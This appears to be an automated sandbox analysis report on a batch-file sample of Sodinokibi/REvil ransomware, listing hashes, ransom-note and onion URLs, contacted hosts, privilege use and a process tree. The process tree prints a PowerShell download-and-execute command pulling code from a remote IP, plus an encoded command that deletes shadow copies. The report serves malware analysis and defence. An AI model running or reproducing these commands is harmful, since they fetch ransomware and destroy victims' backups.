Analysis
-
max time kernel
143s -
max time network
137s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
22-04-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
bRDkHdRf.bat
Resource
win7v200410
Behavioral task
behavioral2
Sample
bRDkHdRf.bat
Resource
win10v200410
General
-
Target
bRDkHdRf.bat
-
Size
189B
-
MD5
b0fdd8126abe00e3607bc60b33cfd211
-
SHA1
22fe9dfc70b79b53d6a958d30c42dd7640554e8d
-
SHA256
8508a74435256a2c8472db03d6c09f8ac0d60ded076803d1dc9e5bec75b162ac
-
SHA512
cc6eab2d339081bce0d73366bda16a138f53f6ee31b0d39a23ffbe4dfb68511a8d0917092296706b8d9fba32d0aa0efea2d9c89b88baaa5f2b36fe426302514d
Malware Config
Extracted
http://185.103.242.78/pastes/bRDkHdRf
Extracted
C:\ivx701a929-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC
http://decryptor.cc/FB14B9B4438547FC
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeBackupPrivilege 1728 vssvc.exe Token: SeRestorePrivilege 1728 vssvc.exe Token: SeAuditPrivilege 1728 vssvc.exe Token: SeTakeOwnershipPrivilege 1036 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1036 powershell.exe 1036 powershell.exe 1036 powershell.exe 1508 powershell.exe 1508 powershell.exe -
Blacklisted process makes network request 56 IoCs
Processes:
powershell.exeflow pid process 3 1036 powershell.exe 5 1036 powershell.exe 6 1036 powershell.exe 8 1036 powershell.exe 10 1036 powershell.exe 11 1036 powershell.exe 13 1036 powershell.exe 15 1036 powershell.exe 17 1036 powershell.exe 18 1036 powershell.exe 20 1036 powershell.exe 21 1036 powershell.exe 23 1036 powershell.exe 24 1036 powershell.exe 26 1036 powershell.exe 27 1036 powershell.exe 29 1036 powershell.exe 31 1036 powershell.exe 32 1036 powershell.exe 34 1036 powershell.exe 37 1036 powershell.exe 39 1036 powershell.exe 41 1036 powershell.exe 42 1036 powershell.exe 45 1036 powershell.exe 46 1036 powershell.exe 48 1036 powershell.exe 50 1036 powershell.exe 52 1036 powershell.exe 56 1036 powershell.exe 58 1036 powershell.exe 59 1036 powershell.exe 61 1036 powershell.exe 63 1036 powershell.exe 64 1036 powershell.exe 66 1036 powershell.exe 68 1036 powershell.exe 69 1036 powershell.exe 71 1036 powershell.exe 72 1036 powershell.exe 74 1036 powershell.exe 76 1036 powershell.exe 81 1036 powershell.exe 83 1036 powershell.exe 85 1036 powershell.exe 87 1036 powershell.exe 89 1036 powershell.exe 91 1036 powershell.exe 92 1036 powershell.exe 93 1036 powershell.exe 95 1036 powershell.exe 97 1036 powershell.exe 98 1036 powershell.exe 100 1036 powershell.exe 102 1036 powershell.exe 104 1036 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\76bzc.bmp" powershell.exe -
Makes http(s) request 17 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 81 https://triactis.com/news/images/es.png HTTP URL 83 https://www.triactis.com/page-403.php HTTP URL 85 https://waynela.com/news/images/evpoulkh.jpg HTTP URL 8 https://patrickfoundation.net/uploads/graphic/roefpdiqqsjygs.jpg HTTP URL 13 https://allfortheloveofyou.com/content/image/wrkpwaxyhemh.png HTTP URL 15 https://hexcreatives.co/uploads/assets/tnajacsaxbgj.png HTTP URL 37 https://coding-marking.com/static/assets/qubvwwiv.png HTTP URL 61 https://danskretursystem.dk/static/images/insn.jpg HTTP URL 3 http://185.103.242.78/pastes/bRDkHdRf HTTP URL 87 https://www.waynela.com/news/images/evpoulkh.jpg HTTP URL 91 https://zewatchers.com/news/images/zewtjx.jpg HTTP URL 64 https://www.danskretursystem.dk/static/images/insn.jpg/ HTTP URL 76 https://gymnasedumanagement.com/data/pictures/bneint.gif HTTP URL 34 https://stoeferlehalle.de/news/graphic/uhymeidy.jpg HTTP URL 39 https://serce.info.pl/content/temp/ko.gif HTTP URL 50 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 63 https://www.danskretursystem.dk/static/images/insn.jpg -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2024 wrote to memory of 1036 2024 cmd.exe powershell.exe PID 1036 wrote to memory of 1508 1036 powershell.exe powershell.exe PID 1036 wrote to memory of 1508 1036 powershell.exe powershell.exe PID 1036 wrote to memory of 1508 1036 powershell.exe powershell.exe PID 1036 wrote to memory of 1508 1036 powershell.exe powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\ivx701a929-readme.txt powershell.exe File opened for modification \??\c:\program files\LimitGrant.snd powershell.exe File opened for modification \??\c:\program files\SuspendGet.odt powershell.exe File opened for modification \??\c:\program files\UpdateUnpublish.xht powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ivx701a929-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ivx701a929-readme.txt powershell.exe File created \??\c:\program files\ivx701a929-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableUndo.au3 powershell.exe File opened for modification \??\c:\program files\EnableSync.edrwx powershell.exe File opened for modification \??\c:\program files\JoinClear.pptm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ivx701a929-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterUnregister.mpg powershell.exe File opened for modification \??\c:\program files\SaveRepair.emz powershell.exe File opened for modification \??\c:\program files\CompleteUninstall.dotx powershell.exe File opened for modification \??\c:\program files\ConvertToRestore.ttc powershell.exe File opened for modification \??\c:\program files\SwitchUnprotect.wm powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\bRDkHdRf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bRDkHdRf');Invoke-JUCJCK;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Modifies system certificate store
- Drops file in Program Files directory
PID:1036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1508
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1728